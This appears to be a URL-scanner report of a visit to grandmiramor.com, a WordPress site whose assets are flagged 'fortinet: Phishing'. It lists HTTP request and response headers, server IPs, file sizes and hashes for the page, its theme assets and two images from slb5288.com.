Md5:    59b21f41121bcd79543b7d214e1e0c6a
Sha1:   d52af2bfc77f53be4062e61e2c8df5d5edc81650
Sha256: 0bb4cfb25c280decd7caaaf8206d8a635fe1db790df7d51f781dd8b43e2613bb
                                        
                                            GET / HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
vary: Accept-Encoding
x-powered-by: PHP/7.4.21
link: <https://grandmiramor.com/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   28742
Md5:    33cead7a42e282b9c90596607e010ccf
Sha1:   2391397faf2ed518b07b673831f13d46c4f309bd
Sha256: 91438a591715cbf1d6ffc33f48b5ce330e756a47766bd6fb52b3b386ffd0a861

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/library/fontawesome/css/all.min.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-de0a"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   20360
Md5:    58ff3cca67e34f75978a4919526303c5
Sha1:   3335de266ff7080af99af43475118eac08d24b34
Sha256: c4df5b209d7fd80c36c50d5b25b30f48391b235025034a8277c08a0045283516

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /go/images/1614078011374776.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:13 GMT
Content-Length: 10367
Last-Modified: Fri, 04 Jun 2021 09:38:24 GMT
Connection: keep-alive
ETag: "60b9f490-287f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 226 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   10367
Md5:    7a32726b8d61cfc3aaf74099138a941d
Sha1:   a350df2e64714d2ce06bd81caf8abbe736abdb00
Sha256: 9868621bfc45ed46a1db362155308ed9dfaf74ebf67de95a94e9f94e32ad704c
                                        
                                            GET /go/images/bvi_footer.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:13 GMT
Content-Length: 2438
Last-Modified: Fri, 04 Jun 2021 09:17:04 GMT
Connection: keep-alive
ETag: "60b9ef90-986"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 156 x 37, 8-bit colormap, non-interlaced\012- data
Size:   2438
Md5:    148b5e04990558a40ea48f236eb643bb
Sha1:   86c6b16cc0f8829fed3a39dd09b7fff826c63b12
Sha256: d9d87f7cdd09a2a3947525882727b0d5b4dfa7092e32a5fcd8ae08dd7bb27f5e
                                        
                                            GET /css?family=Roboto+Condensed%3A300%2C300i%2C400%2C400i%2C700%7CRoboto%3A300%2C400%2C500%2C700%7CLato%3A300%2C400%2C500%2C700&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Thu, 24 Nov 2022 15:13:09 GMT
date: Thu, 24 Nov 2022 15:13:09 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1405
Md5:    96daef8fcf85c7b660148dd556747fd9
Sha1:   14af5e672044c3f1b3f04bbcb6c92720d2d7543f
Sha256: cf1ac17bc5f07e49ffaccc8820e31e02ff3b9cb67f69d45133d73df0f09d96e1
                                        
                                            GET /wp-content/themes/educenter/assets/library/lightslider/css/lightslider.min.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-159e"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   3758
Md5:    1bbb0d1a470fc86f79ee0462f18d4892
Sha1:   fe6770636e6b8cb52fa92d016e861a13d2222406
Sha256: ef8ede0b80b7b38ebd26d964508248d7b27c9a1c960e478f880730f51d5161bb
                                        
                                            GET /wp-content/themes/educenter/assets/library/prettyphoto/css/prettyPhoto.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-6a18"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   5691
Md5:    df9b848eee6ade6bb57726a6018a25cc
Sha1:   7423654ed7447954e166ff9a22435b678844a2a1
Sha256: 205990af998b9130984aa54f5fd3c562c6dff0b68ed7c593a1b7c79504783ccb

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/style.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-1bbba"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   123125
Md5:    547422487914ebaaee6e0f081066750d
Sha1:   1d41882ce803e745a9194a84bb9603e081be292b
Sha256: 398dd45ae7b9d5149917b8f85415abf0a0e3e13c33671d3006cae749f0aa3259

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/sparklethemes/mobile-menu/navigation.js?ver=1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-5acc"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 20:26:39 GMT
vary: Accept-Encoding
etag: W/"636180ff-48b9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Cookie: Hm_lvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lpvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791; Hm_lpvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:12 GMT
location: https://grandmiramor.com/wp-includes/images/w-logo-blue-white-bg.png
x-powered-by: PHP/7.4.21
link: <https://grandmiramor.com/wp-json/>; rel="https://api.w.org/"
x-redirect-by: WordPress
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/themes/educenter/assets/library/prettyphoto/js/jquery.prettyPhoto.js?ver=3.1.6 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-89e0"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/js/educenter-custom.js?ver=20151215 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-23c0"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Wed, 02 Nov 2022 08:36:11 GMT
vary: Accept-Encoding
etag: W/"63622bfb-15e54"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:14:35 GMT
vary: Accept-Encoding
etag: W/"6360d56b-2bd8"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/library/lightslider/js/lightslider.min.js?ver=1.1.6 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-3e97"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/library/theia-sticky-sidebar/js/theia-sticky-sidebar.min.js?ver=1.6.0 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-141b"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/sparklethemes/mobile-menu/mobile-menu.css?ver=1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-1164"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/themes/educenter/assets/css/responsive.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-3c9b"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing